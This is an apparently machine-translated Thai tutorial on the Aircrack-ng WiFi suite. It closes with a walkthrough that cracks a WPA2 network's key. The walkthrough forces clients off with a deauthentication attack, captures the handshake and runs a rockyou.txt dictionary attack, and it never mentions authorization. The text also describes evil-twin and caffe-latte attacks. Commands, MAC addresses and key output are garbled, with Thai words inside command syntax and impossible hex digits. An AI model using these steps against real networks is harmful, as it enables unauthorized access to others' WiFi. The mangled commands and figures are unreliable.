Aircrack-ng เป็นซอฟต์แวร์ครบชุดที่ออกแบบมาเพื่อทดสอบความปลอดภัยเครือข่าย WiFi มันไม่ได้เป็นเพียงเครื่องมือเดียวแต่เป็นชุดของเครื่องมือ ซึ่งแต่ละเครื่องมือมีจุดประสงค์เฉพาะ สามารถทำงานในด้านการรักษาความปลอดภัย wifi ในด้านต่างๆ ได้ เช่น การตรวจสอบจุดเข้าใช้งาน การทดสอบ การโจมตีเครือข่าย การแคร็กเครือข่าย wifi และการทดสอบ วัตถุประสงค์หลักของ Aircrack คือการสกัดกั้นแพ็กเก็ตและถอดรหัสแฮชเพื่อทำลายรหัสผ่าน รองรับอินเทอร์เฟซไร้สายใหม่เกือบทั้งหมด Aircrack-ng เป็นเวอร์ชันปรับปรุงของชุดเครื่องมือ Aircrack ที่ล้าสมัย ng หมายถึง รุ่นใหม่ . เครื่องมือที่ยอดเยี่ยมบางอย่างที่ทำงานร่วมกันเพื่อทำงานที่ใหญ่ขึ้น
แอร์มอน:
Airmon-ng รวมอยู่ในชุด aircrack-ng ที่วางการ์ดอินเทอร์เฟซเครือข่ายในโหมดจอภาพ การ์ดเครือข่ายมักจะยอมรับเฉพาะแพ็กเก็ตที่กำหนดเป้าหมายสำหรับพวกเขาตามที่กำหนดโดยที่อยู่ MAC ของ NIC แต่ด้วย airmon-ng แพ็กเก็ตไร้สายทั้งหมดไม่ว่าจะกำหนดเป้าหมายสำหรับพวกเขาหรือไม่ก็ตามก็จะได้รับการยอมรับเช่นกัน คุณควรจะสามารถดักจับแพ็กเก็ตเหล่านี้ได้โดยไม่ต้องลิงก์หรือตรวจสอบสิทธิ์กับจุดเชื่อมต่อ ใช้เพื่อตรวจสอบสถานะของจุดเข้าใช้งานโดยกำหนดให้อินเทอร์เฟซเครือข่ายอยู่ในโหมดจอภาพ ประการแรก เราต้องกำหนดค่าการ์ดไร้สายให้เปิดโหมดจอภาพ จากนั้นปิดกระบวนการพื้นหลังทั้งหมด หากคุณคิดว่ากระบวนการใดๆ ขัดขวาง หลังจากสิ้นสุดกระบวนการ คุณสามารถเปิดใช้งานโหมดการตรวจสอบบนอินเทอร์เฟซไร้สายได้โดยการรันคำสั่งด้านล่าง:
[ป้องกันอีเมล] :~$sudoairmon-ng เริ่ม wlan0#
คุณยังสามารถปิดใช้งานโหมดจอภาพได้ด้วยการหยุด airmon-ng ทุกเมื่อโดยใช้คำสั่งด้านล่าง:
[ป้องกันอีเมล] :~$sudoairmon-ng หยุด wlan0#แอร์โรดัม:
Airodump-ng ใช้เพื่อแสดงรายการเครือข่ายทั้งหมดที่อยู่รอบตัวเรา และดูข้อมูลที่มีค่าเกี่ยวกับเครือข่ายเหล่านั้น ฟังก์ชันพื้นฐานของ airodump-ng คือการดมกลิ่นแพ็กเก็ต ดังนั้นจึงถูกตั้งโปรแกรมให้จับแพ็กเก็ตทั้งหมดรอบตัวเราในขณะที่อยู่ในโหมดมอนิเตอร์ เราจะเรียกใช้กับการเชื่อมต่อทั้งหมดรอบตัวเรา และรวบรวมข้อมูล เช่น จำนวนไคลเอนต์ที่เชื่อมต่อกับเครือข่าย ที่อยู่ Mac ที่สอดคล้องกัน ลักษณะการเข้ารหัส และชื่อช่องสัญญาณ จากนั้นจึงเริ่มกำหนดเป้าหมายเครือข่ายเป้าหมายของเรา
โดยการพิมพ์คำสั่ง airodump-ng และตั้งชื่ออินเทอร์เฟซเครือข่ายเป็นพารามิเตอร์ เราสามารถเปิดใช้งานเครื่องมือนี้ได้ โดยจะแสดงรายการจุดเชื่อมต่อทั้งหมด จำนวนแพ็คเก็ตข้อมูล วิธีการเข้ารหัสและการตรวจสอบสิทธิ์ที่ใช้ และชื่อเครือข่าย (ESSID) จากมุมมองของการแฮ็ก ที่อยู่ Mac เป็นฟิลด์ที่สำคัญที่สุด
[ป้องกันอีเมล] :~$sudoairodump-ng wlx0mon
แอร์แคร็ก:
Aircrack ใช้สำหรับถอดรหัสรหัสผ่าน หลังจากจับแพ็กเก็ตทั้งหมดโดยใช้ airodump เราสามารถถอดรหัสคีย์ด้วย aircrack มันถอดรหัสคีย์เหล่านี้โดยใช้สองวิธี PTW และ FMS วิธีการของรถสองและรถสามล้อเครื่องจะกระทำในสองขั้นตอน ในตอนแรก จะใช้เฉพาะแพ็กเก็ต ARP เท่านั้น และหลังจากนั้น หากคีย์ไม่แตกหลังจากการค้นหา ก็จะใช้แพ็กเก็ตที่ดักจับอื่นๆ ทั้งหมด ข้อดีอีกอย่างของแนวทาง PTW คือไม่ได้ใช้แพ็กเก็ตทั้งหมดสำหรับการแคร็ก ในแนวทางที่สอง นั่นคือ FMS เราใช้ทั้งแบบจำลองทางสถิติและอัลกอริทึมแบบดุดันเพื่อถอดรหัสคีย์ สามารถใช้วิธีพจนานุกรมได้
ออกอากาศ:
Airplay-ng แนะนำแพ็กเก็ตให้กับเครือข่ายไร้สายเพื่อสร้างหรือเร่งการรับส่งข้อมูล สามารถดักจับแพ็กเก็ตจากสองแหล่งที่แตกต่างกันโดย aireplay-ng อันแรกคือเครือข่ายสด และอันที่สองคือแพ็กเก็ตจากไฟล์ pcap ที่มีอยู่แล้ว Airplay-ng มีประโยชน์ในระหว่างการโจมตีแบบ deauthentication ที่กำหนดเป้าหมายไปยังจุดเชื่อมต่อไร้สายและผู้ใช้ ยิ่งไปกว่านั้น คุณสามารถทำการโจมตีบางอย่างได้ เช่น การโจมตีกาแฟลาเต้ด้วย airplay-ng ซึ่งเป็นเครื่องมือที่ช่วยให้คุณได้รับคีย์จากระบบของลูกค้า คุณสามารถทำได้โดยจับแพ็กเก็ต ARP จากนั้นจัดการและส่งกลับไปยังระบบ ลูกค้าจะสร้างแพ็กเก็ตที่สามารถดักจับโดย airodump และ aircrack ถอดรหัสคีย์จากแพ็กเก็ตที่แก้ไขนั้น ตัวเลือกการโจมตีอื่นๆ ของ airplay-ng ได้แก่ chopchop, fragment arepreplay เป็นต้น
ฐานทัพอากาศ:
Airbase-ng ใช้เพื่อแปลงคอมพิวเตอร์ของผู้บุกรุกให้เป็นจุดเชื่อมต่อที่ถูกบุกรุกเพื่อให้ผู้อื่นเชื่อมโยงได้ เมื่อใช้ Airbase-ng คุณสามารถอ้างว่าเป็นจุดเข้าใช้งานที่ถูกกฎหมายและดำเนินการโจมตีแบบ man-in-the-middle บนคอมพิวเตอร์ที่เชื่อมต่อกับเครือข่ายของคุณ การโจมตีประเภทนี้เรียกว่า Evil Twin Attacks เป็นไปไม่ได้ที่ผู้ใช้พื้นฐานจะแยกแยะระหว่างจุดเชื่อมต่อที่ถูกกฎหมายและจุดเชื่อมต่อปลอม ดังนั้น Evil Twin Threat เป็นหนึ่งในภัยคุกคามไร้สายที่คุกคามมากที่สุดที่เราเผชิญอยู่ในปัจจุบัน
แอร์โรลิบง:
Airolib เร่งกระบวนการแฮ็คด้วยการจัดเก็บและจัดการรายการรหัสผ่านและจุดเชื่อมต่อ ระบบจัดการฐานข้อมูลที่โปรแกรมนี้ใช้คือ SQLite3 ซึ่งส่วนใหญ่จะใช้ได้กับทุกแพลตฟอร์ม การถอดรหัสรหัสผ่านรวมถึงการคำนวณของมาสเตอร์คีย์แบบคู่ผ่านคีย์ส่วนตัวชั่วคราว (PTK) ที่ถูกแยกออกมา เมื่อใช้ PTK คุณสามารถกำหนดรหัสระบุข้อความเฟรม (MIC) สำหรับแพ็กเก็ตที่กำหนดและค้นหา MIC ในทางทฤษฎีว่าคล้ายกับแพ็กเก็ต ดังนั้นหาก PTK ถูกต้อง PMK ก็ถูกต้องเช่นกัน
หากต้องการดูรายการรหัสผ่านและเข้าถึงเครือข่ายที่จัดเก็บไว้ในฐานข้อมูล ให้พิมพ์คำสั่งต่อไปนี้:
[ป้องกันอีเมล] :~$sudoฐานข้อมูลการทดสอบ airolib-ng –statsที่นี่ฐานข้อมูลทดสอบคือฐานข้อมูลที่คุณต้องการเข้าถึงหรือสร้าง และ –stats คือการดำเนินการที่คุณต้องการดำเนินการ คุณสามารถดำเนินการได้หลายอย่างในฟิลด์ฐานข้อมูล เช่น ให้ความสำคัญกับ SSID บางอย่างหรือบางอย่าง ในการใช้ airolib-ng กับ aircrack-ng ให้ป้อนคำสั่งต่อไปนี้:
[ป้องกันอีเมล] :~$sudoaircrack-ng-NSฐานข้อมูลการทดสอบ wpa2.eapol.capที่นี่เราใช้ PMK ที่คำนวณแล้วที่เก็บไว้ใน ทดสอบฐานข้อมูล เพื่อเร่งกระบวนการถอดรหัสรหัสผ่าน
การแคร็ก WPA/WPA2 โดยใช้ Aircrack-ng:
มาดูตัวอย่างเล็กๆ น้อยๆ ว่า aircrack-ng สามารถทำอะไรได้บ้างโดยใช้เครื่องมือที่ยอดเยี่ยมสองสามอย่าง เราจะถอดรหัสคีย์ที่แชร์ล่วงหน้าของเครือข่าย WPA/WPA2 โดยใช้วิธีการพจนานุกรม
สิ่งแรกที่เราต้องทำคือแสดงรายการอินเทอร์เฟซเครือข่ายที่รองรับโหมดมอนิเตอร์ สามารถทำได้โดยใช้คำสั่งต่อไปนี้:
[ป้องกันอีเมล] :~$sudoairmon-ngชิปเซ็ตไดรเวอร์อินเทอร์เฟซ PHY
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.
เราสามารถเห็นอินเทอร์เฟซ ตอนนี้ เราต้องใส่อินเทอร์เฟซเครือข่ายที่เราพบ ( wlx0 ) ในโหมดมอนิเตอร์โดยใช้คำสั่งต่อไปนี้:
[ป้องกันอีเมล] :~$sudoairmon-ng เริ่ม wlx0
ได้เปิดใช้งานโหมดจอภาพบนอินเทอร์เฟซที่เรียกว่า wlx0mon .
ตอนนี้เราควรเริ่มฟังการออกอากาศโดยเราเตอร์ใกล้เคียงผ่านอินเทอร์เฟซเครือข่ายของเราที่เราได้วางไว้ในโหมดมอนิเตอร์
[ป้องกันอีเมล] :~$sudoairodump-ng wlx0monCH5 ][ผ่านไป:30NS][ 2020-12-02 00:17
BSSID PWR บีคอน#ข้อมูล #/s CH MB ENC CIPHER AUTH ESSID
E4: 6F:13: 04: ซีอี:31 -สี่ห้า 62 27 0 154e WPA2 CCMP PSK CrackIt
C4:E9:84:76:10:เป็น-63 77 0 0 654จ. WPA2 CCMP PSK Hackme
C8:3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07
74:ให้:88:FA:38: 02-68 28 2 0 สิบเอ็ด54e WPA2 CCMP PSK TP-Link_3802
BSSID STATION อัตรา PWR โพรบเฟรมที่หายไป
E4: 6F:13: 04: ซีอี:315C:3A:สี่ห้า: D7: EA: 8B -3 0- 1e8 5
E4: 6F:13: 04: ซีอี:31C4:67:D3:C2:ซีดี:D7 -331e- 6e0 3
E4: 6F:13: 04: ซีอี:315C:C3:07:56:61: เอฟ -35 0-1 0 6
E4: 6F:13: 04: ซีอี:31ปีก่อนคริสตกาล:91:B5:F8:7E:D5 -390e-1 1002 13
เครือข่ายเป้าหมายของเราคือ Crackit ในกรณีนี้ซึ่งกำลังฉายอยู่ทางช่อง 1
ที่นี่เพื่อถอดรหัสรหัสผ่านของเครือข่ายเป้าหมาย เราจำเป็นต้องจับการจับมือแบบ 4 ทาง ซึ่งเกิดขึ้นเมื่ออุปกรณ์พยายามเชื่อมต่อกับเครือข่าย เราสามารถจับภาพได้โดยใช้คำสั่งต่อไปนี้:
[ป้องกันอีเมล] :~$sudoairodump-ng-ค 1--bssid E4: 6F:13: 04: ซีอี:31 -ใน /บ้าน wlx0-ค : ช่อง
–Bss : Bssid ของเครือข่ายเป้าหมาย
-ใน : ชื่อของไดเร็กทอรีที่จะวางไฟล์ pcap
ตอนนี้เราต้องรอให้อุปกรณ์เชื่อมต่อกับเครือข่าย แต่มีวิธีที่ดีกว่าในการจับมือกัน เราสามารถยกเลิกการตรวจสอบอุปกรณ์ไปยัง AP โดยใช้การโจมตี deauthentication โดยใช้คำสั่งต่อไปนี้:
[ป้องกันอีเมล] :~$sudoaireplay-ng-0 -ถึงE4: 6F:13: 04: ซีอี:31ถึง : Bssid ของเครือข่ายเป้าหมาย
-0 : การโจมตี deauthentication
เราได้ยกเลิกการเชื่อมต่ออุปกรณ์ทั้งหมดแล้ว และตอนนี้เราต้องรอให้อุปกรณ์เชื่อมต่อกับเครือข่าย
CH1 ][ผ่านไป:30NS][ 2020-12-02 00:02][จับมือ WPA: E4: 6F:13: 04: ซีอี:31BSSID PWR RXQ บีคอน#ข้อมูล #/s CH MB ENC CIPHER AUTH E
E4: 6F:13: 04: ซีอี:31 -47 1 228 807 36 1WPA2 CCMP PSK P . ครั้งที่ 54
BSSID STATION อัตรา PWR โพรบเฟรมที่หายไป
E4: 6F:13: 04: ซีอี:31ปีก่อนคริสตกาล:91:B5:F8:7E:D5 -35 0-1 0 1
E4: 6F:13: 04: ซีอี:315C:3A:สี่ห้า: D7: EA: 8B -290e- 1e0 22
E4: 6F:13: 04: ซีอี:31 88:28: B3:30:27:7E -310e-1 0 32
E4: 6F:13: 04: ซีอี:31C4:67:D3:C2:ซีดี:D7 -350e- 6e263 708แคร็กอิท
E4: 6F:13: 04: ซีอี:31D4: 6A: 6A:99:ED:E3 -350e- 0e0 86
E4: 6F:13: 04: ซีอี:315C:C3:07:56:61: เอฟ -37 0- 1e0 1
เราถูกโจมตี และเมื่อดูที่มุมขวาบนถัดจากเวลา เราจะเห็นว่ามีการจับมือกัน ตอนนี้ดูในโฟลเดอร์ที่ระบุ ( /บ้าน ในกรณีของเรา ) สำหรับ a .pcap ไฟล์.
ในการถอดรหัสคีย์ WPA เราสามารถใช้คำสั่งต่อไปนี้:
[ป้องกันอีเมล] :~$sudoaircrack-ng-a2 -ในrockyou.txt-NSE4: 6F:13: 04: ซีอี:31จับมือ.capb :Bssid ของเครือข่ายเป้าหมาย
-a2 :โหมด WPA2
Rockyou.txt: พจนานุกรมไฟล์ใช้แล้ว
Handshake.cap: Theไฟล์ ที่มีการจับมือกัน
Aircrack-ng1.2beta3
[00:01:49] 10566กุญแจทดสอบ(1017.96ถึง/NS)
ข้อมูลสำคัญ! [คุณมีฉัน]
มาสเตอร์คีย์ : 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6Fห้าสิบค
คีย์ชั่วคราว : 4D C4 5R 6T76 996G 7H 8D EC
H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B
A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089
8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B
MAC: CB 5A F8 CE62B2 1B F7 6Fห้าสิบC025 62E9 5D71
กุญแจสู่เครือข่ายเป้าหมายของเราถูกถอดรหัสสำเร็จแล้ว
บทสรุป:
เครือข่ายไร้สายมีอยู่ทุกที่ ทุกบริษัทใช้ ตั้งแต่พนักงานที่ใช้สมาร์ทโฟนไปจนถึงอุปกรณ์ควบคุมอุตสาหกรรม จากการวิจัยพบว่าเกือบร้อยละ 50 ของปริมาณการใช้อินเทอร์เน็ตจะผ่าน WiFi ในปี 2564 เครือข่ายไร้สายมีข้อดีหลายประการ การสื่อสารภายนอกประตู การเข้าถึงอินเทอร์เน็ตอย่างรวดเร็วในสถานที่ที่แทบจะวางสายไม่ได้ สามารถขยายเครือข่ายโดยไม่ต้องติดตั้งสายเคเบิล สำหรับผู้ใช้รายอื่น และสามารถเชื่อมต่ออุปกรณ์มือถือของคุณกับโฮมออฟฟิศของคุณได้อย่างง่ายดายในขณะที่คุณไม่อยู่
แม้จะมีข้อดีเหล่านี้ แต่ก็ยังมีคำถามมากมายเกี่ยวกับความเป็นส่วนตัวและความปลอดภัยของคุณ เป็นเครือข่ายเหล่านี้ ภายในช่วงการส่งสัญญาณของเราเตอร์นั้นเปิดให้ทุกคนสามารถโจมตีได้ง่าย และข้อมูลของคุณอาจถูกบุกรุกได้ง่าย ตัวอย่างเช่น หากคุณเชื่อมต่อกับ wifi สาธารณะ ใครก็ตามที่เชื่อมต่อกับเครือข่ายนั้นสามารถตรวจสอบการรับส่งข้อมูลเครือข่ายของคุณได้อย่างง่ายดายโดยใช้ข้อมูลอัจฉริยะและด้วยความช่วยเหลือของเครื่องมือที่ยอดเยี่ยมที่มีอยู่และแม้กระทั่งการถ่ายโอนข้อมูล